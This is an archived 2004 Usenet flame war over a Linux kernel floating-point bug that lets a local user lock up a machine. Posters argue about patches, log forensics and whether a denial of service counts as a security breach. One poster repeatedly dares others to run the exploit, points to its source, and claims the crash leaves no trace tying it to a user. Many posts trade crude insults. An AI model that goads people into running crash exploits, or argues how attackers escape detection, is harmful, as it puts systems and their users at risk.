| On Sun, 20 Jun 2004 08:51:41 -0700, Kelsey Bjarnason wrote:
> On Sun, 20 Jun 2004 06:05:21 -0700, T.G.Reaper wrote:
>
> Nah,
That's what I figured the answer would be.
> You see, if you can't do that, then all that's required to render a Linux
> box absolutely secure against remote exploits is to disable remote logins,
Problem is, this is a local exploit as well, it's just that remote shells
make it possible to execute local code from remote locations. So even with
remote logins disabled any box that has more than one or two active user
accounts, still has it's XXX hanging out in the wind doesn't it?
> which would be a very bad blow for Windows in any comparison of security.
LOL, having to turn off a service in Linux because there's a big
XXXXing hole in it makes Windows security look bad, that's a good one.
> While we're at it, let's also try it the other way: you open up your
> Windows box to remote logins, give us the account information and we'll
> see which box survives the longer: the Linux box with remote logins, or
> the Windows box with remote logins.
I thought you said "Nah" to the request for a shell account?
You also might have a little difficulty connecting to Windows Terminal
Server if I were to enable it.
> Oh, but wait... your little exploit
> just locks up the box, it doesn't, say, give the user admin privileges
> which they can use to access private information, etc, right? So there's
> no "0wn3d" involved here at all, really - just frozen.
That's right, maybe that's why the call it a Denial of Service attack.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Buford 2004-06-26, 1:20 pm |
| On Sat, 19 Jun 2004 20:43:25 -0700, T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
>
>
>
> Here sport, compile and run this
LOL. I think you're missing what's so funny about it. Just like last
time.
Anyway, here's my answer to your request that I copy&paste, save, compile,
and run your virus: No.
There. See? Your virus/worm/crashware doesn't work on my box.
I'm betting you still don't get it, though. 
--
Buford
.o. "I'm doing a free operating system (just a hobby, won't be
..o big and professional like gnu)..."
ooo - Linus Torvalds, 1991
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 10:54:42 -0500, Sinister Midget wrote:
> On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
>
> You mean so I can _delegate_ steps a-d? It _still_ requires me to
> cooperate or you don't get to do it.
> It's not just about being "easy", it's about being "just as easy",
> which is the claim made over and over and over wrt how linux is going
> to be just as in-trouble as Windoze.
Problem is, if you're an ISP or a medium sized company with a few unhappy
employees, one of the "bad guys" may in fact be one of your regular users,
who already HAS a shell account. Anything that lets a regular user crash a
system is REALLY REALLY BAD.
I ran the FPU exploit code on my humble little Gentoo box three times, the
last time Pan lost ALL of my subscribed groups, What might get lost if a
disgruntled employee executes it on the server that houses the company
payroll? or some server that contains customer/client/shipping information?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 09:02:04 -0700, Kelsey Bjarnason wrote:
> On Sun, 20 Jun 2004 05:56:47 -0700, T.G.Reaper wrote:
>
>
> Probably nowhere near "millions", given how easy it is to update Linux
> boxes.
Not in this case. On Gentoo at least, emerge -u system doesn't do a damned
thing to prevent this FPU bug from locking a system hard.
>
> Non-kernel patches, sure.
Well that doesn't cover this particular vulnerability now does it.
>
> It's a _kernel_ patch, isn't it?
Oh please, go at least do a little research before you post about
something you don't even know the basic facts about.
>
> "killed" is one thing. Security breaches are another.
That's one of the silliest statements I've read in a long time. What
school teaches that brilliant axiom?
Hint: Denial of service.
>
> Loads of 'em. Of those, how many is an arbitrary hacker going to have
> shell access on?
All it would take is one unhappy user with an axe to grind.
> Of those, how many are going to be vulnerable to said
> issue?
Every single one that hasn't actually been patched.
As of this moment, the various Linux update tools like YOU, emerge
apt-get, etc, do NOT protect against this vulnerability. That may change,
in the future, but in the mean time, the majority of Linux boxes on the
planet will gladly bend over and spread their cheeks for any user with a
shell account.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 16:06:00 +0000, John wrote:
> T.G.Reaper wrote:
> That's nice, TG. But, guess what? Since I don't write code and have no
> need for gcc, it's not installed on my system. That means
> a) I can't compile your program, and
> b) Since I can't compile it, I can't run it.
>
> Now, next time you're going to have to make sure it's in an executable form
> for those of us with no programming languages installed.
I don't care whether you run it or not. If you did, I already know what
the result would be.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 18:41:38 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> < snip TeeGee garbage >
>
>
> That *you* don't see anything means absolutely zilch.
was there to be seen.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 10:54:42 -0500, Sinister Midget wrote:
>
>
>
>
> Problem is, if you're an ISP or a medium sized company with a few unhappy
> employees, one of the "bad guys" may in fact be one of your regular users,
> who already HAS a shell account.
That "bad guy" would rather fast see some pretty nasty post from a lawyer
> Anything that lets a regular user crash a system is REALLY REALLY BAD.
>
Granted. Still it is just a local DOS exploit. A patched one, to boot
> I ran the FPU exploit code on my humble little Gentoo box three times, the
> last time Pan lost ALL of my subscribed groups, What might get lost if a
> disgruntled employee executes it on the server that houses the company
> payroll? or some server that contains customer/client/shipping
> information?
>
You're wriggling like mad just to keep your argument. Although it is totally
stupid.
--
Microsoft's Guide To System Design:
Form follows malfunction.
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 18:41:38 +0200, Peter Köhlmann wrote:
>
> was there to be seen.
>
Again off your meds, Idiot?
Still no idea how to hunt down that "bad user"? Still completely clueless?
--
<html><input type crash></html>
Just out of curiosity does this actually mean something or have some
of the few remaining bits of your brain just evaporated?
| |
| John A. Bailo 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
>
> [ 16:45:32] Linux Kernel Crash $ ls -ls
> total 40
> 20 -rw------- 1 Reaper users 16900 Jun 16 16:56
> 2004-06-11_kernel_crash.t2t.tar.bz2
> 8 -rwxr-xr-x 1 Reaper users 7242 Jun 19 15:31 EvilKernel.Exe
> 4 -rw-r--r-- 1 Reaper users 1471 Jun 16 17:01 Evil_krnl-1.c
> 4 -rw-r--r-- 1 Reaper users 1168 Jun 19 15:25 Evil_krnl-1.o
> 4 -rw-r--r-- 1 Reaper users 529 Jun 16 17:03 Original_Evil_Crash.c
> [ 16:45:35] Linux Kernel Crash $
> [ 16:45:52] Linux Kernel Crash $ su root
> Password:
> [ 16:46:14] Linux Kernel Crash $ whoami
> root
> [ 16:46:23] Linux Kernel Crash $ uname -a
> Linux SniFF 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004 i686 Pentium III
> (Coppermine) GenuineIntel GNU/Linux
> [ 16:46:35] Linux Kernel Crash $
> [ 16:46:38] Linux Kernel Crash $ emerge -u system
> Calculating system dependencies ...done!
>
>
> * GNU info directory index is up-to-date.
>
> [ 16:46:57] Linux Kernel Crash $ exit
> exit
> [ 16:47:27] Linux Kernel Crash $ whoami
> Reaper
> [ 16:47:34] Linux Kernel Crash $ ./EvilKernel.Exe
>
> __________________________________
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happen the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
>
>
The system admin can limit the Load Average for the user.
That would squelch your *exploit* very fast.
--
w:4
| |
| Kelsey Bjarnason 2004-06-26, 1:20 pm |
| [snips]
> Not in this case. On Gentoo at least, emerge -u system doesn't do a damned
> thing to prevent this FPU bug from locking a system hard.
1) That's Gentoo
2) That's easily worked around by snarfing a kernel - or patch -
elsewhere.
> Well that doesn't cover this particular vulnerability now does it.
>
>
> Oh please, go at least do a little research before you post about
> something you don't even know the basic facts about.
The flaw is in the kernel's handling of an FP issue, no? Hence, the patch
would be a kernel patch, no? Hence it would require a reboot, no?
>
> That's one of the silliest statements I've read in a long time. What
> school teaches that brilliant axiom?
>
> Hint: Denial of service.
DOS is not security breach. With a few zombies to play with, you could
DOS ebay right off the net. Exactly how many customer's credit card
numbers does this buy you? Zero. Because you haven't breached security
at all.
>
> All it would take is one unhappy user with an axe to grind.
And who doesn't mind facing charges, given that it requires a remote
logon, hence, a user account.
>
> Every single one that hasn't actually been patched.
Which is how many?
> As of this moment, the various Linux update tools like YOU, emerge
> apt-get, etc, do NOT protect against this vulnerability. That may
> change, in the future, but in the mean time, the majority of Linux boxes
> on the planet will gladly bend over and spread their cheeks for any user
> with a shell account.
Which is how many?
| |
| Norwegian Formula 2004-06-26, 1:20 pm |
| T.G.Reaper, after spending 3 minutes figuring out which end of the pen to use,
wrote:
> On Sun, 20 Jun 2004 16:06:00 +0000, John wrote:
>
>
>
> I don't care whether you run it or not. If you did, I already know what
> the result would be.
>
BWAAAAAAHAHAHAHAHAHAHA! What were you doing when you thought that...running
around the room trying to catch the one amoeba that leaked out of your ear that
you call a brain? XXXXing athletes foot fungus makes fun of you.
--
Linux 2.4.20-4GB-athlon
4:32pm up 9 days 19:56, 2 users, load average: 0.00, 0.04, 0.00
| |
| Sinister Midget 2004-06-26, 1:20 pm |
| On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Sun, 20 Jun 2004 09:02:04 -0700, Kelsey Bjarnason wrote:
>
>
>
> Not in this case. On Gentoo at least, emerge -u system doesn't do a damned
> thing to prevent this FPU bug from locking a system hard.
>
>
> Well that doesn't cover this particular vulnerability now does it.
>
>
> Oh please, go at least do a little research before you post about
> something you don't even know the basic facts about.
>
>
> That's one of the silliest statements I've read in a long time. What
> school teaches that brilliant axiom?
>
> Hint: Denial of service.
>
>
> All it would take is one unhappy user with an axe to grind.
>
>
> Every single one that hasn't actually been patched.
>
> As of this moment, the various Linux update tools like YOU, emerge
> apt-get, etc, do NOT protect against this vulnerability. That may change,
> in the future, but in the mean time, the majority of Linux boxes on the
> planet will gladly bend over and spread their cheeks for any user with a
> shell account.
It still requires that every machine have a user with a shell account
that would then have a reason to run this program, or could be tricked
into running it. And it still requires that the given machine be
unpatched. That's going to be less than 1% of the machines that meet
all of the conditions needed. Far less.
Most problems with WinDross require no user with an axe to grind and
nobody getting tricked into running the errant binary, no shell access,
no assistance in exploiting things by compiling and making executable,
no nothing. Just view the header in an email and you are 'sploited. Or
browse a page and start infecting your friends & neighbors for fun &
profit. Click on a link in a page and start getting your machine
hijacked.
--
Linux: Because you can!
| |
| William Poaster 2004-06-26, 1:20 pm |
| begin On Sun, 20 Jun 2004 11:24:38 -0600, GreyCloud posted:
>
>
> T.G.Reaper wrote:
>
> Actually, an offer like this exists now at DEFCON 12 being held in Las
> Vegas, NV. on July 31, 2004 to Aug. 1, 2004. A Linux box will be there
> for various hackers to hack. They didn't even want an Alpha box with
> OpenVMS on it as they know that the hackers won't get in and is no fun.
Actually I dropped The Grim Reaper in the bin weeks ago. I just got fedup
with reading his crap.
--
Installing Linux is easy, just watch
http://www.theinquirer.net/?article=6276
| |
|
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 16:06:00 +0000, John wrote:
>
>
>
> I don't care whether you run it or not. If you did, I already know what
> the result would be.
>
Of course you do: It wouldn't work since I patched that exploit a few days
ago.
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 20:50:54 +0000, John A. Bailo wrote:
> The system admin can limit the Load Average for the user.
>
> That would squelch your *exploit* very fast.
God you're a XXXXing moron.
http://www.suse.co.uk/de/security/2004_17_kernel.html
Quote:
"There is no workaround known."
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 22:53:26 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> That "bad guy" would rather fast see some pretty nasty post from a lawyer
That hasn't stopped people from defacing Apache servers running on
Linux, why would it stop this.
It doesn't stop people from committing robbery or murder, I see no reason
to believe it would somehow magically take effect in this context.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| GreyCloud 2004-06-26, 1:21 pm |
|
William Poaster wrote:
> begin On Sun, 20 Jun 2004 11:24:38 -0600, GreyCloud posted:
>
>
>
>
> Actually I dropped The Grim Reaper in the bin weeks ago. I just got fedup
> with reading his crap.
>
Somehow I see his posts in comp.os.vms. I don't read them and the posts
seemed to mixed up with some other flame war going on with Nomen Nescio
or somebody like that.
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 14:04:03 -0700, Kelsey Bjarnason wrote:
> [snips]
>
>
> 1) That's Gentoo
> 2) That's easily worked around by snarfing a kernel - or patch -
> elsewhere.
I didn't say patches didn't exist, they do. I'm just saying the doing an
automatic on-line update does not get you patched against this
particular bug.
>
> DOS is not security breach. With a few zombies to play with, you could
> DOS ebay right off the net.
This is not the same as one person controlling several hundred machines,
and just chewing up all your bandwidth. That indeed is not a security
breach. This is one person, a regular user, having the power to kill a
server dead, and the OS letting it happen. Sorry, I don't care how you
phrase it, or dress it up, that most certainly IS a security breach.
http://www.suse.co.uk/de/security/2004_17_kernel.html
Subject: [suse-security-announce] SUSE Security Announcement: kernel
(SuSE-SA:2004:017)
http://fedoranews.org/updates/FEDORA-2004-171.shtml
[SECURITY] Fedora Core 2 Update: kernel-2.6.6-1.435
http://lists.trustix.org/pipermail/...une/000247.html
Trustix Security Advisor tsl@xxxxxxxxxxx
________________________________________
___________________
For a bug that isn't really a security breach as you contend, there sure
are an awful lot of security announcements regarding it.
> Exactly how many customer's credit card
> numbers does this buy you? Zero. Because you haven't breached security
> at all.
Another stupid statement.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 22:01:46 +0000, Sinister Midget wrote:
> On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
>
> It still requires that every machine have a user with a shell account
> that would then have a reason to run this program, or could be tricked
> into running it. And it still requires that the given machine be
> unpatched. That's going to be less than 1% of the machines that meet
> all of the conditions needed. Far less.
Christ, I'm not saying that it's going to destry the Net, or implode the
universe, there isn't any one single person with access to enough Linux
boxes to do any widespread damage. That doesn't change the fact that it's
a very serious bug. Hell I had one Linux nut try to tell ne that the
vulnerability wasn't actually a security breach. I'm just saying that
whether or not it causes widespread damage and destruction, it's still a
very serous for an OS to allow a regular user to render it inoperable.
> Most problems with WinDross require no user with an axe to grind and
> nobody getting tricked into running the errant binary, no shell access,
> no assistance in exploiting things by compiling and making executable,
> no nothing. Just view the header in an email and you are 'sploited. Or
> browse a page and start infecting your friends & neighbors for fun &
> profit. Click on a link in a page and start getting your machine
> hijacked.
That's just a collection of exaggerated half truths, combined with a few
meaningless generalities that you couldn't support with cold hard facts
and references if your life depended on it. I've several Windows systems
right here in front of me that are used on a daily basis, all of them are
clean and stable and have been for years.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Mon, 21 Jun 2004 00:44:03 +0000, John wrote:
> T.G.Reaper wrote:
>
>
> Of course you do: It wouldn't work since I patched that exploit a few days
> ago.
Then compile and run it, you surely are invulnerable, what harm could it
do, or are you not sure?
Since you're all patched up to date, then you should be invulnerable
to the FPU exploit code, right?. I say your not.
The only way to find out for sure is to compile and run the code. You can
get it from here:
http://linuxreviews.org/news/2004-0...rash/index.html
If you're not willing to run a simple little test, the your pronouncements
of how your all secure and invulnerable because of Linux's great bug
fixing and package management will ring a little hollow.
I'm not posting any binaries, I'm not asking for help in "OwNinG"
anybodies system. I'm just saying if you aren't willing to test what you
say is actually true, I don't particularly want to hear all your hot air
about how great this or some other attribute of the OSS patch/update
system is.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:21 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 22:53:26 +0200, Peter Köhlmann wrote:
>
>
>
> That hasn't stopped people from defacing Apache servers running on
> Linux, why would it stop this.
>
Not the same thing. If the user has an account, he is hardly some unknown
fool. His actions can be traced back to him quite easily
> It doesn't stop people from committing robbery or murder, I see no reason
> to believe it would somehow magically take effect in this context.
>
Well, if you rob a bank and leave your address, it would be roughly the same
thing.
You can twist it as much as you like, the fact remains: The bad guy has to
have a shell acoount. He is not unknown. His actions can be traced back.
In other words, he would have to be as stupid as TG Reaper to do such a
stunt
--
Windows was created to keep stupid people away from UNIX."
__--_Tom_Christiansen
| |
| Peter Köhlmann 2004-06-26, 1:21 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 14:04:03 -0700, Kelsey Bjarnason wrote:
>
>
> I didn't say patches didn't exist, they do. I'm just saying the doing an
> automatic on-line update does not get you patched against this
> particular bug.
>
Idiot
--
"Last I checked, it wasn't the power cord for the Clue Generator that
was sticking up your XXX." - John Novak, rasfwrj
| |
| Sinister Midget 2004-06-26, 1:21 pm |
| On 2004-06-21, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Sun, 20 Jun 2004 22:01:46 +0000, Sinister Midget wrote:
>
>
>
> Christ, I'm not saying that it's going to destry the Net, or implode the
> universe, there isn't any one single person with access to enough Linux
> boxes to do any widespread damage. That doesn't change the fact that it's
> a very serious bug. Hell I had one Linux nut try to tell ne that the
> vulnerability wasn't actually a security breach. I'm just saying that
> whether or not it causes widespread damage and destruction, it's still a
> very serous for an OS to allow a regular user to render it inoperable.
>
>
> That's just a collection of exaggerated half truths, combined with a few
> meaningless generalities that you couldn't support with cold hard facts
> and references if your life depended on it. I've several Windows systems
> right here in front of me that are used on a daily basis, all of them are
> clean and stable and have been for years.
http://www.computerworld.com.au/ind...316298&eid=-255
http://news.zdnet.co.uk/internet/se...39149406,00.htm
http://www.esecurityplanet.com/aler...cle.php/3345351
http://www.pchell.com/internet/kakworm.shtml
http://www.microsoft.com/security/incident/swen.mspx
http://www.microsoft.com/technet/se...n/MS01-020.mspx
http://www.wired.com/news/infostruc...7,63391,00.html
http://cc.uoregon.edu/cnews/winter2000/bubbleboy.html
http://cert.surfnet.nl/i/2004/I-04-06.htm
http://forums.winforums.org/showthread.php?t=5294
http://www.microsoft.com/security/incident/sasser.mspx
http://www.microsoft.com/security/incident/mydoom.mspx
http://www.infos-du-net.com/en/news...aires-3000.html
http://www.securityfocus.com/archive/1/264590
http://securityresponse.symantec.co...32.korgo.l.html
http://www.utexas.edu/its/alerts/sobig.html
http://www.microsoft.com/technet/se...n/ms04-011.mspx
That's enough. There are enough that this could go on for years and
years.
Yeah, some of those aren't so new. But I wanted to illustrate the
problems aren't new either.
So, which ones are "exaggerated half truths" and/or "meaningless
generalities"? Are you going to claim to know more about WinDOS than
MICROS~1? They have some (dis)honorable mentions there, too.
--
You look through tinted Windows and only see the closed Gates beyond them.
| |
| Jim Richardson 2004-06-26, 1:21 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Sun, 20 Jun 2004 12:42:27 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Sun, 20 Jun 2004 18:41:38 +0200, Peter Köhlmann wrote:
>
> was there to be seen.
>
nah, you just don't know how to read logs. Or what logs to read.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1pkYd90bcYOAWPYRAiFyAKCmQ8+4yNg7
MTa8eu2QdaYWj3Y1tgCeOu30
4hYSwsVo7lRZLrRY+ETk3qc=
=ZWcX
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Money is truthful. If a man speaks of his honor, make him pay cash
-- Lazarus Long
| |
| William Poaster 2004-06-26, 1:21 pm |
| begin On Mon, 21 Jun 2004 09:38:21 +0200, Peter Köhlmann posted:
> T.G.Reaper wrote:
>
WTF? Jeez is this guy clueless.
[vbcol=seagreen]
> Idiot
Seconded.
--
Installing Linux is easy, just watch
http://www.theinquirer.net/?article=6276
| |
| Peter Jensen 2004-06-26, 1:21 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
T.G.Reaper wrote:
> I don't see anything at all that indicates in anyway that user
> "Reaper" caused any type of problem at all. Where is this "proof" that
> the Admin would use to kick me off the payroll, or make me pay
> damages?
I'm guessing he'd examine the WTMP logs to find out who was logged in at
the time of crash. If it's a remote login, auth.log will also hold the
username and IP address. Then he'd go over that users files and find
the nasty in some directory he has write access to. Having the nasty
executable owned by you is pretty hard evidence. Enough to get you
kicked off the machine, at least. There is simply no way to hide the
evidence, once you kill the machine.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1qukd1ZThqotgfgRAlCcAJ9F3gO+7vbu
saqZ0iMYxDazPVcDQwCfeAlW
rwcEIYKsuYyO5adg5uJBGsM=
=8O4l
-----END PGP SIGNATURE-----
--
PeKaJe
You're being followed. Cut out the hanky-panky for a few days.
| |
| TuxTrax 2004-06-26, 1:21 pm |
| "T.G.Reaper" <Reaper@127.0.0.1.Com> wrote in message news:<pan.2004.06.20.00.44.56.867246@127.0.0.1.Com>...
snip crash info
> __________________________________
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happen the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
while certainly interesting in the abstract, what exactly is your
point? Like any decent Linux vulnerability, keyboard or shell access
is required. Any system that dosen't have remote log in locked down,
and shadow passwords enabled is asking for a good thrashing and it
dosen't require a kernel exploit to do it.
regards,
Mathew
| |
| Peter Köhlmann 2004-06-26, 1:21 pm |
| Peter Jensen wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> T.G.Reaper wrote:
>
>
> I'm guessing he'd examine the WTMP logs to find out who was logged in at
> the time of crash.
TeeGee cartainly has never heard of "last" which does just that
If he had, he would have some vague idea how to start to hunt down that "bad
guy" he keeps blathering about.
< snip more explanations way over TeeGee's head >
--
Clippy: "It looks like you're trying to sue us,
would you like me to delete all of your files?"
| |
| T.G.Reaper 2004-06-26, 1:22 pm |
| On Mon, 21 Jun 2004 08:34:12 +0000, Jim Richardson wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Sun, 20 Jun 2004 12:42:27 -0700,
> T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
>
> nah, you just don't know how to read logs. Or what logs to read.
>
Okay wizard, why don't you actually prove me wrong. crash a system from a
regular user account with the exploit code, and then simply post the
log entries that prove a paticular user name caused the hang.
I know, your too busy and important to be "troubled" with such
trivialities as actually backing up your claims that a hard system hang
can be traced to single user account. I say it can't, and actually posted
system log entries spanning a hang/reboot.
You've just simply said I'm wrong without even providing a single
suggestion whatsoever, of where this supposed tracking information DOES
exist. If you would simply do that one little tiny thing, then everyone,
even people who aren't sure who is correct in this case, could verify that
your claim is the correct one.
Otherwise it looks like your just blowing smoke.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:22 pm |
| On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
> Not the same thing. If the user has an account, he is hardly some unknown
> fool. His actions can be traced back to him quite easily
>
No they can't, once the exploit code executes, no log entries are made,
nothing is updated or saved, even the log entries that are waiting to be
flushed to disk are gone.
Time to put up or shut up Peter. I've already posted system log entries
showing that the system log shows no tractable information. You don't get
to just say I'm wrong or don't know what I'm doing. Either crash a system
with the exploit code, and post the log entries showing how the hang can
be traced to a particular user, or shut up.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:22 pm |
| On Mon, 21 Jun 2004 09:34:31 +0000, Peter Jensen wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> T.G.Reaper wrote:
>
>
> I'm guessing he'd examine the WTMP logs to find out who was logged in at
> the time of crash.
There could be lots of people logged in at any given time, that doesn't
narrow it down to an individual user.
> If it's a remote login, auth.log will also hold the
> username and IP address.
That doesn't specify that particular user caused the crash.
> Then he'd go over that users files and find
> the nasty in some directory he has write access to.
Owning a copy of exploit code is not illegal.
> Having the nasty
> executable owned by you is pretty hard evidence.
No it's not. It doesn't prove that any single person actually DID
something.
> Enough to get you
> kicked off the machine, at least.
Yeah, as long as your willing to convict someone on vague circumstantial
evidence.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:22 pm |
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
>
>
>
> No they can't, once the exploit code executes, no log entries are made,
> nothing is updated or saved, even the log entries that are waiting to be
> flushed to disk are gone.
>
> Time to put up or shut up Peter. I've already posted system log entries
> showing that the system log shows no tractable information. You don't get
> to just say I'm wrong or don't know what I'm doing. Either crash a system
> with the exploit code, and post the log entries showing how the hang can
> be traced to a particular user, or shut up.
>
You are really a retard. You know next to nothing about linux and then claim
this bullshit
And since when can you force me to do anything at all, you lying piece of
shit?
--
Never put off till tomorrow what you can avoid all together.
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:22 pm |
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
>
>
>
> No they can't, once the exploit code executes, no log entries are
> made,
Oh, really, you shitpacking submissive slut? So, the sysadmin will
not be able to see who last logged in or use tools such as system
accounting? There are dozens of easy methods available to track
every single user's activities, you obtuse sack of snot.
Here's an idea for you. Why don't you scour the net and look for
various system accounting tools and patches, install them all, and
try to defeat them one by one so you can come back and brag how
your Volunteer Exploit can propogate unleashed across the net and
devastate the Linux world, you obtuse shitpacking loser.
| |
| Jim Richardson 2004-06-26, 1:22 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, 21 Jun 2004 09:48:34 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Mon, 21 Jun 2004 08:34:12 +0000, Jim Richardson wrote:
>
>
>
> Okay wizard, why don't you actually prove me wrong. crash a system from a
> regular user account with the exploit code, and then simply post the
> log entries that prove a paticular user name caused the hang.
>
> I know, your too busy and important to be "troubled" with such
> trivialities as actually backing up your claims that a hard system hang
> can be traced to single user account. I say it can't, and actually posted
> system log entries spanning a hang/reboot.
>
